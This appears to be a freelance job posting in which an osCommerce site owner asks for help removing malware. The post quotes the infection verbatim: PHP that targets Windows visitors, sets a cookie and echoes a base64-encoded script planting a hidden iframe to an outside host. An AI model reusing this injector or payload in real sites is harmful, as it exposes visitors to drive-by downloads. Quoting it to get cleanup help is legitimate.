oscommerce site with Malaware
$30-250 USD
Paid on delivery
Hello,
My oscommerce website is infected with a hidden Malaware.
When you log on to my website you see this error:
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home1/ajdreams/public_html/includes/[login to view URL]) in /home1/ajdreams/public_html/includes/functions/[login to view URL] on line 97
and you refresh the page the error disapears, and this following code appears (not always):
^ j•™j¤kSôXJAU(p(QU,o08õP=c„aŸC"Gƒ‚(_/f2{clù~I?”6s˜fi2+4£Ho•oœiAk£¦)ZO\9n]2./ñ÷‚?rOYD |ü*m§Bp’f•=oj(õPAuB‚*PH$€SVg44''=c…1ku&oT~û*.;3sZ &«Ktl2¢–a6'fzHo–?h›E“t¢ü%N1:fTf[\ó,ZnpyQ @RSü*n
I was checking through the files, and a weird code keeps adding itself on [login to view URL] (even when i delete it, it reappears 10 min later):
*/
/**start PHNjcmlwdCBsYW5ndWFnZT0nSmF2YVNjcmlwdCc+ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCc2LjcoXCc8MiA1PSI0Oi8vMy44LjkvIiBiPSIxIiBjPSIxIiBhPSIwIj48LzI+XCcpOycsMTMsMTMsJ3x8aWZyYW1lfHVsdGltYXRlNTh8aHR0cHxzcmN8ZG9jdW1lbnR8d3JpdGV8Y298Y2N8ZnJhbWVib3JkZXJ8d2lkdGh8aGVpZ2h0Jy5zcGxpdCgnfCcpLDAse30pKTs8L3NjcmlwdD4= end**/
$__name = md5($_SERVER['HTTP_HOST']);
$reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)";
if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) {
$date = date("D, j M Y 00:00:00", time()+60*60*24*30);
$cookie = time().".".rand(1111111, 9999999);
$set_js = @setcookie ($__name, $cookie, time()+60*60*24*30);
if(!$set_js)
echo '<script type="text/javascript">[login to view URL] = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>';
$__content = file_get_contents(__FILE__);
preg_match("#\*start(.*?)end\*#is", $__content, $__m);
if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) {
echo base64_decode($__m[1]);
}
elseif(isset($__m[1]) and trim($__m[1])!="") {
echo $__m[1];
}
}
unset ($__name);
Some of my visitors told me that, programs are downloaded automatically to their computer. When they use firefox, their browser crashes.
And on top of all when i was checking through my files i noticed an unknown PHP file. ([login to view URL]). It's in fact a login portal to somewhere in my website (it had a username and password area, when you click on cancel it sends you to google russia), but I've deleted it.
Please bid if you only have experience.
Thanks
Project ID: #807567
About the project
16 freelancers are bidding on average $89 for this job
we offer quality solution,time base completion with support. ***** Check PMB ***** Best Regard
Hi, I'm an experienced osCommerce developer and I have experience in virus removal and future protection. Ready to get started.
Please let me know when we have to start the work for u We r on Skype add me as sankalpsaxena7